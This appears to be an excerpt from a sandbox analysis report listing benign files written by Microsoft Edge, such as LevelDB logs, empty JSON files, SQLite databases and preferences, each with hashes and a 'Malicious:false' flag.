                                                                                                                                                                                                                                                                                                                                    MD5:256E2D7CFCB7A5AFBA3372496C88C1D1
                                                                                                                                                                                                                                                                                                                                    SHA1:6DBE039A3F093ACA2BA4D7E3075D01973C65DAB5
                                                                                                                                                                                                                                                                                                                                    SHA-256:5605F43F300BBE40DAAEE8B1F188295713FCB42830DA328E77503075A6AB843A
                                                                                                                                                                                                                                                                                                                                    SHA-512:72E6D9A408B118E106598162F9D7076579E619430D783BBC16D2DD3CC972364F8F31DE4B059617246CA6DFD996BC486B5346E3DCE5506E7C6B6B019570484A94
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:30.759 150c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/31-03:46:30.760 150c Recovering log #3.2024/12/31-03:46:30.761 150c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274146150925307
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:ofE79+v4Yeb8rcHEZrELFUt8xfE7J/+xfEg9V5LYeb8rcHEZrEZSJ:W4Yeb8nZrExg89LYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                                    MD5:256E2D7CFCB7A5AFBA3372496C88C1D1
                                                                                                                                                                                                                                                                                                                                    SHA1:6DBE039A3F093ACA2BA4D7E3075D01973C65DAB5
                                                                                                                                                                                                                                                                                                                                    SHA-256:5605F43F300BBE40DAAEE8B1F188295713FCB42830DA328E77503075A6AB843A
                                                                                                                                                                                                                                                                                                                                    SHA-512:72E6D9A408B118E106598162F9D7076579E619430D783BBC16D2DD3CC972364F8F31DE4B059617246CA6DFD996BC486B5346E3DCE5506E7C6B6B019570484A94
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:30.759 150c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/31-03:46:30.760 150c Recovering log #3.2024/12/31-03:46:30.761 150c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1600
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.593846500149443
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:9Z5WcGn0XZXpV03Sx497AHHk2GJ348ylsuyG:9L6nu9pZdP8osI
                                                                                                                                                                                                                                                                                                                                    MD5:E4511A907B0E5027B8413D21FD8AAE57
                                                                                                                                                                                                                                                                                                                                    SHA1:5543FE54E2F0693A0FB7510B535CEDAA0CA233C7
                                                                                                                                                                                                                                                                                                                                    SHA-256:FF8A9CDFBBEDB5DA43FC91B0633551156D20D36431DA27DB06BE4C920C9D6A48
                                                                                                                                                                                                                                                                                                                                    SHA-512:D0E32665B6C097EA7B17DEC6F56332E4FD8D31602644AC7B5B81C1FB869A549E490C743C99CBC4DA91FCDE083275F77FC63832904B000C8440BA30FBBD8F1C17
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:. ..9................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1068}.!_https://ntp.msn.com..LastKnownPV..1735634794050.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735634795240.._https://ntp.msn.com..MUID!.05F9EFDB33DC678B1BFFFABD3256667F.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735634794148,"schedule":[-1,9,35,20,-1,-1,-1],"scheduleFixed":[-1,9,35,20,-1,-1,-1],"simpleSchedule":[13,25,31,22,9,28,26]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735634794018.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.16094520659162
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9kQL+q2P923oH+Tcwt8a2jMGIFUt8M6f98UUiG1Zmw+M6f9dSQLVkwO923oHr:of2Q+v4Yeb8EFUt8xffG1/+xfyQV5LYL
                                                                                                                                                                                                                                                                                                                                    MD5:2C8B8B43C21BAB4CCBDB55EFD7C431DE
                                                                                                                                                                                                                                                                                                                                    SHA1:FD971B0A63DA64D9AF794EB9BE560F2C8315CA74
                                                                                                                                                                                                                                                                                                                                    SHA-256:38B9B2A0F12F3A832F27597516878940700DAAECFDE578B41312C58497A073A1
                                                                                                                                                                                                                                                                                                                                    SHA-512:27FD58C970DC7D9B6626089994CB86F092CE178C69E216302AF3F46A10262030B271BA058AE2144962AB2EAFE58752292CA26AE676BDFDB8018AC45322B0F39D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.044 119c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/31-03:46:26.045 119c Recovering log #3.2024/12/31-03:46:26.048 119c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.16094520659162
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9kQL+q2P923oH+Tcwt8a2jMGIFUt8M6f98UUiG1Zmw+M6f9dSQLVkwO923oHr:of2Q+v4Yeb8EFUt8xffG1/+xfyQV5LYL
                                                                                                                                                                                                                                                                                                                                    MD5:2C8B8B43C21BAB4CCBDB55EFD7C431DE
                                                                                                                                                                                                                                                                                                                                    SHA1:FD971B0A63DA64D9AF794EB9BE560F2C8315CA74
                                                                                                                                                                                                                                                                                                                                    SHA-256:38B9B2A0F12F3A832F27597516878940700DAAECFDE578B41312C58497A073A1
                                                                                                                                                                                                                                                                                                                                    SHA-512:27FD58C970DC7D9B6626089994CB86F092CE178C69E216302AF3F46A10262030B271BA058AE2144962AB2EAFE58752292CA26AE676BDFDB8018AC45322B0F39D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.044 119c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/31-03:46:26.045 119c Recovering log #3.2024/12/31-03:46:26.048 119c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7703228462718905
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:tT2SmwxATyxVezJDe4eo+ee7Xcf0L/ZJVb:V2SmsAWxEzJDe4a7XI0LhJVb
                                                                                                                                                                                                                                                                                                                                    MD5:5BFC498C36B547CE0C450CF91D736409
                                                                                                                                                                                                                                                                                                                                    SHA1:5E2E175CB80C90267BB7EF6BDC5EEA84CBE7EC8F
                                                                                                                                                                                                                                                                                                                                    SHA-256:7CF5FE43417AD7ED2188F3DE52897C7B0714BD604200F91CD8479F858D3C5AEC
                                                                                                                                                                                                                                                                                                                                    SHA-512:BD639361FFF46BA2EBD53CB24E35F645FC0A7BD906CDCD8087783D1B84473F712E814DF23E6F58AE6583A481E250E676F8A49247BA1728166EA81E6ABE1F9C07
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2121573952272502
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTo:JkIEumQv8m1ccnvS6VqA5ev
                                                                                                                                                                                                                                                                                                                                    MD5:5B14CB9196862EBDCC641CC209AB4D7F
                                                                                                                                                                                                                                                                                                                                    SHA1:050FB5FB68348D9F7E31196D602BB5FD0857ECD1
                                                                                                                                                                                                                                                                                                                                    SHA-256:A2E8C78D6D1C330916CC70580A20203287A4EC0809731964DEE06FB84AED7FE9
                                                                                                                                                                                                                                                                                                                                    SHA-512:FADBE88F2783DF55660B260B84CAFD8214E6E75C016F17E4FA3E832F58006D24007026D6419A92D26EFD6533F778D671823C83218F40C7D15C46776FD66840DE
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):13853
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239503772870446
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:stVJ99QTryDigabatSuypSswfsZihUkA6OYGFiN8bbV+F0sQwj66W9aFIMYLPiYJ:stVPGKSu4SswffhAbGJQwO6W9aTYX
                                                                                                                                                                                                                                                                                                                                    MD5:FF16F73C270C2BEED3545B32AF911E92
                                                                                                                                                                                                                                                                                                                                    SHA1:0E1B009F0B4BCAAD462DFC2FFAA0674A5DEE673B
                                                                                                                                                                                                                                                                                                                                    SHA-256:E3E0F1E1CAAC5CAB9A06AB03CEBF970B3EC41D2604B127B184F464A651F21B6A
                                                                                                                                                                                                                                                                                                                                    SHA-512:A2AB52225ACB3D998DAF613FD24B9E5F9BAD626A4D9EB9A0A87D786BC5BCC0C85C84758EA8537CDEB43395240864D22813778CB7863ECD4CAA78C0EAABE66E23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380108386242373","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):13853
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239503772870446
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:stVJ99QTryDigabatSuypSswfsZihUkA6OYGFiN8bbV+F0sQwj66W9aFIMYLPiYJ:stVPGKSu4SswffhAbGJQwO6W9aTYX
                                                                                                                                                                                                                                                                                                                                    MD5:FF16F73C270C2BEED3545B32AF911E92
                                                                                                                                                                                                                                                                                                                                    SHA1:0E1B009F0B4BCAAD462DFC2FFAA0674A5DEE673B
                                                                                                                                                                                                                                                                                                                                    SHA-256:E3E0F1E1CAAC5CAB9A06AB03CEBF970B3EC41D2604B127B184F464A651F21B6A
                                                                                                                                                                                                                                                                                                                                    SHA-512:A2AB52225ACB3D998DAF613FD24B9E5F9BAD626A4D9EB9A0A87D786BC5BCC0C85C84758EA8537CDEB43395240864D22813778CB7863ECD4CAA78C0EAABE66E23
                                                                                                                                                                                                                                                                                                                                    Malicious:false
